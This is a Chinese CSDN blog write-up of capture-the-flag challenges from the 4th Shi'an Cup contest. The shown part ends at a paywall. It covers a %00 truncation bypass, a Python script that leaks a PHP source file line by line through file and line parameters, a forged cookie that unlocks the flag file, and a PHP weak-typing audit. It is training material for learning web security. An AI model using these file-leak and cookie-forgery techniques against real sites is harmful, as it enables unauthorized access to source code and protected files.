第四届“”世安杯“”线上赛题解(Web+Stego+Misc+Crypto)

最新推荐文章于 2024-06-04 09:58:53 发布
最新推荐文章于 2024-06-04 09:58:53 发布
阅读量4.7k 收藏 1
点赞数
分类专栏: I am Assassin
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/78176379
版权
本文详述了第四届'世安杯'线上赛的解题过程,涵盖Web、Misc和Crypto领域的题目。从ctf入门级题目到更复杂的RSA加密破解,每个环节都涉及到知识点的运用和复习,包括源码审计、文件泄露、PHP弱类型匹配、MD5爆破、反序列化漏洞、图像隐藏信息等。
摘要由CSDN通过智能技术生成

题目很多原题,但是还是考验了不少的知识点,就算是原来见过的也当做是复习了一下知识点了。

WEB

ctf入门级题目

非常水的一道题,可以看到源码,然后利用%00截断就可以通过了

这里写图片描述

曲奇饼

原题,直接利用line和file来泄露文件内容,通过臊面轻松知道存在index.php,然后利用一下得到源码审计

#_*_coding:utf-8_*_
import requests
s=requests.session()
file=''
for i in range(19):
    url="http://ctf1.shiyanbar.com/shian-quqi/index.php?line="+str(i)+"&file=aW5kZXgucGhw"
    r=s.get(url)
    content=r.content
    file+=content
print file

得到代码如下

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['file'])?$_GET['file']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&file=a2V5LnR4dA==");
$file_list = array(
'0' =>'key.txt',
'1' =>'index.php',
);

if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){
$file_list[2]='thisis_flag.php';
}

if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

然后知道很简单在cookie中伪造一下就行了

这里写图片描述

类型

这个相对繁琐一些些,但是不难,总之就是需要绕过几个点,这里附一下审计代码

<?php 
show_source(__FILE__); 
$a=0; 
$b=0; 
$c=0; 
$d=0; 
if (isset($_GET['x1'])) 
{ 
        $x1 = $_GET['x1']; 
        $x1=="1"?die("ha?"):NULL; 
        switch ($x1) 
        { 
        case 0: 
        case 1: 
                $a=1; 
                break; 
        } 
} 
$x2=(array)json_decode(@$_GET['x2']); 
if(is_array($x2)){ 
    is_numeric(@$x2["x21"])?die("ha?"):NULL; 
    if(@$x2["x21
最低0.47元/天 解锁文章
Assassin__is__me
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MQTT_SIot_webControl_20210425.sb3
04-26
掌控板
CryptoStego:带有加密技术的JS库-通过加密和模糊处理隐藏图像中的文本
02-21
CryptoStego 用于加密技术的JS库-通过加密和模糊处理隐藏图像中的文本。 支持最低有效位模式和DCT模式。 版本 v1.8 演示 注意:库需要HTML5支持! 下载 下载注意:此JS库需要HTML5支持! 特征 混淆-无效位的随机初始化 无标题的非线性逐位消息存储。 专为绝对安全而设计(没有信号提示密码错误。错误的密码会导致错误的消息)。 1.8中的新增功能:有效位及其顺序由Mersenne Twister PRNG决定,并使用SHA512(password)生成种子。 与旧方法相比,它更快,并且导致更少的JS错误。 LSB(最低有效位)模式 使用每个像素的RGB通道的最低有效位来存储消息 所得图像在视觉上与原始图像相同 只能以非压缩格式(例如PNG)存储 DCT(离散余弦变换)模式 通过稍微改变频域中每个块的最低频率分量来存储信息 坚固的图像压缩能力,但与LSB模式相比存
世安杯Writeup
千尺浪的博客
10-18 1105
世安杯Writeup 星空下更加无敌队(黑龙江大学) 共计725分
【XCTF】【GFSJ0006】【Misc】【难度1】Banmabanma
新青年1号
07-18 2043
【XCTF】【GFSJ0006】【Misc】【难度1】Banmabanma
【CTF MISC】XCTF GFSJ0011 心仪的公司 Writeup(流量分析)
最新发布
HEX9CF的技术博客
06-04 447
暂无。
ctf笔记—杂项篇(斑马条形码)
qq_64875725的博客
09-13 804
这是一道简单的图片隐写题,扫描图片直接就能出来flag,难度级别几乎为0。查看图片首先想到条形码,这里直接用在线工具去解码,这里用到的工具是。,只需要将图片直接放到网站上去扫就ok了,
[CTF] 20200415公司CTF赛writeup
第八个男人
04-15 1538
1. 签到题 直接对该字符串做base64解密,得flag:flag{are_you_ready_for_wangdingcup}。 2. 美味的曲奇 点击题目地址,发现进入一个网页后,没有其他可以点击的内容。使用浏览器按F12查看,刷新后发现消息头中cookie为flag开头字符串,同时也符合题目中“曲奇”的cookie含义。 3. 小明学习了数据库的增删改...
CTF练习——MISC密码学部分
zytjulie的博客
08-22 2285
CTF信息安全训练,MISC密码学部分
世安科技:2021年半年度报告.zip
09-29
【世安科技2021年半年度报告】 世安科技作为一家专注于信息安全领域的公司,其发布的2021年半年度报告详细揭示了公司在过去六个月的运营状况、财务表现和技术发展等方面的关键信息。这份报告不仅是对世安科技业务的...
世安科技:2021年半年度报告.PDF
08-24
世安科技:2021年半年度报告.PDF
大型群众性活动安全风险评估[借鉴].pdf
10-28
例如,北京市于2005年出台了《北京市大型社会活动安全管理条例》,规定大型活动需经专业第三方评估机构评估后才能获准举办。北京蓝盾世安信息咨询有限公司作为早期从事此项服务的机构,与科研单位合作,构建了大型...
web tools
03-28
NULL 博文链接:https://guotufu.iteye.com/blog/1212711
文本隐写软件
03-15
包括整个文本信息隐藏的过程,希望对大家有所帮助。
Web Tools 开发者在线工具
04-24
开发者在线工具。我们致力于提供简单实用、贴心智能的在线工具,以提高我们日常的开发效率。这些工具之所以有生气,因为我们都是开发者!
wbstego43open
08-17
Wbstego:一个在声音、图像和文本格式里隐藏信息的完美的专业工具。WbStego4open是一个隐写开源工具,它支持Windows和Linux平台。你可以用WbStego4open可以把文件隐藏到BMP、TXT、HTM和PDF文件中,且不会被看出破绽。还可以用它来创建版权标识文件并嵌入到文件中将其隐藏。
大型群众性活动安全风险评估.pdf
11-18
例如,北京市在2005年颁布了《北京市大型社会活动安全管理条例》,要求大型活动必须经过第三方安全风险评估后才能批准举办。这反映了法规对活动安全的重视,并推动了评估行业的规范化发展。 评估体系和方法是评估...
CTF刷题之旅 2023.3.18
qq_62713355的博客
03-19 680
常规操作,看备注,扔010,binwalk,stegsolve(图片很大不能显示完全,就只看了每一张的左上角)……输入flag发现是错的,原来是密斯电码常用缩写:VY=VERY,GUD=GOOD(简直了,在这里还能挖个坑)。反编译后得到一段python代码,发现是一个计算flag的函数,下载到本地运行即可得到flag。启动winhex解码,右键编辑,选择convert中的Hex-ASCII选项,解码结果如下。得到一串字符,观察得知均为数字和字母且字母最大为f,猜测为16进制编码,解码后得到flag。
攻防世界。斑马。pure_color。Training-Stegano-1
qq_45849014的博客
08-20 144
哈哈哈哈哈哈哈哈哈哈哈哈,这竟然是个密码,真神奇。然后进行解密,结两次。
notepad++安装Dracula
09-25
<<用: vscode是一款由微软开发的代码编辑器,拥有高自由度、高性能和高颜值的特点,并且是免费并且有团队持续快速更新的。vscode集成了许多IDE才具有的功能,并且安装配置插件更为方便。vscode不像IDE一样能够直接在浏览器中打开html,但可以通过插件实现在浏览器中快速打开html文件。此外,vscode支持ES6语法智能提示和快速输入,包括.js、.ts、.jsx、.tsx、.html、.vue等文件类型。>> 关于notepad的Dracula主题安装,notepad是一款Windows系统自带的文本编辑器,并不支持直接安装主题。不过,你可以使用Notepad++,这是一个类似于notepad的免费开源文本编辑器。在Notepad++中,你可以安装Dracula主题。你可以按照以下步骤进行安装: 1. 首先,确保你已经安装了Notepad++编辑器。 2. 打开Notepad++,点击菜单栏上的"插件",然后选择"插件管理器"。 3. 在插件管理器中,你会看到一个可搜索的插件列表。在搜索框中输入"Dracula",然后点击"Install"按钮安装Dracula主题。 4. 安装完成后,重新启动Notepad++编辑器。 5. 完成以上步骤后,你就可以在Notepad++中选择Dracula主题了。点击菜单栏上的"设置",然后选择"样式配置器"。在样式配置器中,你可以找到Dracula主题并应用到Notepad++中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值